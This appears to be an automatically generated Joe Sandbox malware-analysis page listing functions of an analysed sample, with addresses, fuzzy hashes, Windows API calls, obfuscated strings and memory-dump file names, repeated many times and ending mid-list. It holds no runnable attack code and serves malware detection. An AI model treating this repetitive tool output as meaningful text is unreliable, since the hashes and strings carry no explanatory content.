Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34252a99d980ec0edb3431f343705e922fda850094891fdc5f09511613123157
Instruction ID: 30b0e77a8785e1c357fefc0d010a35df1ef97fbaf9c4a031675b46fced51b2ef
Opcode Fuzzy Hash: 34252a99d980ec0edb3431f343705e922fda850094891fdc5f09511613123157
Instruction Fuzzy Hash: CC614D726082049FD724EB28D891B7FB7A3EBD4308F2D846DD58797355EA319D01CB89

Function 00CA92DC Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 00CA9B09

Strings

]kh0, xrefs: 00CA9E76

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: ]kh0
API String ID: 4275171209-3613195681
Opcode ID: d95e7a9ff2c21f0339c35b0a677677a1b3515c4e84b082f81217b78da0014403
Instruction ID: b2f65ea9f8971b50b85b0dce2a1d49c8e26e9efc982af6dbf3a89dabfd61a3aa
Opcode Fuzzy Hash: d95e7a9ff2c21f0339c35b0a677677a1b3515c4e84b082f81217b78da0014403
Instruction Fuzzy Hash: 33014CB950CB078BD3044F77ACC547D76A4EB55329F24432EF952826C1D9720C019516

Function 00C8B420 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,00C5B29B,?,00000001,?,?,?,?,?,?,?), ref: 00C8B452

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cab0a521dc478c079d9e6cb25022356803b7d9f0bb3f963ac915eab0e8ae42d0
Instruction ID: c9d362fb8438537839181fc07f87e6af11320fb7c569e1bb67c13da6c312a0fc
Opcode Fuzzy Hash: cab0a521dc478c079d9e6cb25022356803b7d9f0bb3f963ac915eab0e8ae42d0
Instruction Fuzzy Hash: 33E0E532504114EBC2107B357C0AB6B7678DFC6B18F0A0421F40192166D731EC00D6AD

Function 00C80879 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00C808C3

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 390555f007397572d1eb8d9a26e33cebdaeae4731e3ff9de90956992d89c5078
Instruction ID: b4551a6d20e00d212015702dfa26d600620631d1da83f940351f95b6b05a0ba5
Opcode Fuzzy Hash: 390555f007397572d1eb8d9a26e33cebdaeae4731e3ff9de90956992d89c5078
Instruction Fuzzy Hash: F4011475249702CFE310CF64D4D8B4BBBF1AB84304F14891CE4954B385C7B5A9498FC2

Function 00C7E343 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00C7E38C

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 5b6518b9141979d2d2900c6e8b0f34efe2b613e7388deda3f4e20dc83469704e
Instruction ID: f268090dbcafc1403c9b5381aae83f3764d51e6eee89ad4527395b8e5808486b
Opcode Fuzzy Hash: 5b6518b9141979d2d2900c6e8b0f34efe2b613e7388deda3f4e20dc83469704e
Instruction Fuzzy Hash: 5101F9B5609705CFE305DF28D498B5ABBF1FB89304F10881CE4958B3A1C779A949CF81

Function 00C5CDF0 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 00C5CE04

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 54bda6c2f2c30935502b918c6c166bd57dd8efd4863171dcd58520c235fbb959
Instruction ID: c302c37298c9d78cdb8a47ad92220efab8ecefb737e9f0df144f1c6403abcd3f
Opcode Fuzzy Hash: 54bda6c2f2c30935502b918c6c166bd57dd8efd4863171dcd58520c235fbb959
Instruction Fuzzy Hash: FBD0A7221A0A4837D250A61DDD5FF2B325C8703B78F00162762A2C62C1DC406921D5A5

Function 00C5CE23 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00C5CE36

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 9c2f50edea4c3a028ac6d698da5ba96cd95c17373d7b2ca3fe416e73d800c234
Instruction ID: 80658e5694eae8eaa0b32377be94fc8523534cb5c594a89b0494ec83eae36de6
Opcode Fuzzy Hash: 9c2f50edea4c3a028ac6d698da5ba96cd95c17373d7b2ca3fe416e73d800c234
Instruction Fuzzy Hash: E3D0C9323D430176F5388A18AC67F1932058302F14F701A1AB362FE6D0CCD07111D518

Function 00C89B60 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,00000000,00C62F5C), ref: 00C89B80

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7cfb0e7d488ab9a1825345c763f20c337acbc661a0c4466763c450fb303888e0
Instruction ID: 357071139aae2aa0e88ba7507b823d3ca459c9187e829965d009f8492e49c46d
Opcode Fuzzy Hash: 7cfb0e7d488ab9a1825345c763f20c337acbc661a0c4466763c450fb303888e0
Instruction Fuzzy Hash: 66D0C931545136EBCA506B28BC19BCB3A68DF49631F0B0891B400AA0A4C665EC919AD4

Function 00C89B40 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,00C64E57,00000400), ref: 00C89B50

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 086c5cc331717cdea517a31ab1d9914d501b478e998c7446910487fdae924233
Instruction ID: a52e99798489afb9963ddcbcc95c3792ecccfef423c31d23965c432cdcb9342d
Opcode Fuzzy Hash: 086c5cc331717cdea517a31ab1d9914d501b478e998c7446910487fdae924233
Instruction Fuzzy Hash: AEC04835145124AACB14AB14FC49FCA3A68EF466A4F1A0491B405A70B18660AC82ABA8

Function 00CA96EA Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00CA96EA

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ed0e20920c0af814f69093fe9f89cbee1aaacba6fb0d2e1f445116019980edbf
Instruction ID: d0a1c20e9f9ad68813d30056b70b21e068add8abd07871f4d92c068244ee5ce2
Opcode Fuzzy Hash: ed0e20920c0af814f69093fe9f89cbee1aaacba6fb0d2e1f445116019980edbf
Instruction Fuzzy Hash: 9BC04CB114450ADFA7444F51C84B9FF3A64E912345B20041EEC4155650E6725D24D756

Non-executed Functions

Function 00C796D8 Relevance: 9.1, Strings: 7, Instructions: 340COMMON

Download Yara Rule

Strings

[93=, xrefs: 00C799E6
fa, xrefs: 00C799F6
='0{, xrefs: 00C799DE
;>*2, xrefs: 00C799CE
cba`, xrefs: 00C7974C
9nI9, xrefs: 00C799D6
);?g, xrefs: 00C799EE

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: );?g$9nI9$;>*2$='0{$[93=$cba`$fa
API String ID: 0-154584671
Opcode ID: 718f8b8522ac4d86ad6bd364561e16080b71ab201554445696552f0ea110dd44
Instruction ID: ba5c72b72040895660a46f43f57094faddab44a4111e04777c27cc018d995845
Opcode Fuzzy Hash: 718f8b8522ac4d86ad6bd364561e16080b71ab201554445696552f0ea110dd44
Instruction Fuzzy Hash: 07C1D17550C3A08FC3258F29889066ABBE2EF96320F188B6DF4F957392C7358945CB52

Function 00C6C360 Relevance: 8.1, Strings: 6, Instructions: 626COMMON

Download Yara Rule

Strings

CE, xrefs: 00C6C76D
Vj)l, xrefs: 00C6C9D2
GI, xrefs: 00C6C775
=z9|, xrefs: 00C6C917
}~, xrefs: 00C6C91F
JK, xrefs: 00C6C77D

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: =z9|$JK$Vj)l$}~$CE$GI
API String ID: 0-2837980318
Opcode ID: d38376caff737a6c94feab8593588058999cf8110e06e1dab3bfdb0f787ae3e1
Instruction ID: 56793188dd682d2880008f44807ef17e08a3c7689c736f280901d5c4b8fc0d46
Opcode Fuzzy Hash: d38376caff737a6c94feab8593588058999cf8110e06e1dab3bfdb0f787ae3e1
Instruction Fuzzy Hash: A6020DB550C3408BC724DF69D89266FBBE2EFD5314F08981CE4D68B352E7348A09DB96

Function 00E1437F Relevance: 7.9, Strings: 5, Instructions: 1676COMMON

Download Yara Rule

Strings

2wo, xrefs: 00E14804
m~, xrefs: 00E153FD
^p/u, xrefs: 00E14E4E
DH>_, xrefs: 00E15355
VL.U, xrefs: 00E152BD

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: 2wo$DH>_$VL.U$^p/u$m~
API String ID: 0-1082855936
Opcode ID: a415da80614236184c29ff8616c1650d36967c1b9203feb3c6b2da0238dd7e3c
Instruction ID: 195c111a5eaca7901d29d94ee1fde62ed2cb51ddf272d019b3f0bc0042764e83
Opcode Fuzzy Hash: a415da80614236184c29ff8616c1650d36967c1b9203feb3c6b2da0238dd7e3c
Instruction Fuzzy Hash: 51B218F36082049FE304AE2DDC8567AFBE9EF94320F1A8A3DE6C4C7744E67558058697

Function 00C7D085 Relevance: 6.6, Strings: 5, Instructions: 368COMMON

Download Yara Rule

Strings

#, xrefs: 00C7D4AC
0, xrefs: 00C7D430
P, xrefs: 00C7D554
k, xrefs: 00C7D4B6
AGsW, xrefs: 00C7D496

Memory Dump Source

Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c50000_file.jbxd

Similarity

API ID:
String ID: #$0$AGsW$P$k
API String ID: 0-1629916805
Opcode ID: 679cc22f760b82ccbfa396914935b230ce4da52e8c625080fb4259f65461543f
Instruction ID: a6bf2adc9733e61d75151b7b8dd031e0eab4af98a6f141692fc65cbc80796116
Opcode Fuzzy Hash: 679cc22f760b82ccbfa396914935b230ce4da52e8c625080fb4259f65461543f
Instruction Fuzzy Hash: 06C1D5712083818FD328CF39C4553ABBBE2AFD2304F68C56DD4EA8B2D1D6798509D712

Function 00E201E6 Relevance: 6.6, Strings: 4, Instructions: 1567COMMON

Download Yara Rule

Strings

<#X, xrefs: 00E20B53
]', xrefs: 00E20CAE
w&JW, xrefs: 00E20394
HI?_, xrefs: 00E2137B

Memory Dump Source

Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
